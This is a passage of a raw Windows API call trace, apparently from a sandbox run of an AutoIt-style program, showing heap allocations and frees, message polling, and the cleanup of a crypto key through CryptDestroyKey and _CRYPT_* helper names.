[0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0177.589] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0177.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0177.592] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0177.592] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0177.592] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.593] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.593] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.593] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.593] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0177.593] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0177.593] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.593] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0177.593] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.593] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0177.593] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0177.593] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0177.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0177.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.602] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0177.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0177.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.609] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.609] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0177.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0177.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0177.609] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.610] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0177.610] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0177.610] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0177.610] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0177.610] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.610] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.610] CryptDestroyKey (hKey=0x90aed8) returned 1 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0177.611] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.611] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0177.611] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0177.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0177.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0177.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0177.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0177.612] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0177.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0177.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.612] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.612] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0177.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.612] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.612] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.613] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.613] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0177.613] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.613] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.613] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.613] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.613] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.614] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0177.614] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0177.614] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.614] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df190 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0177.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0177.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0177.615] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, 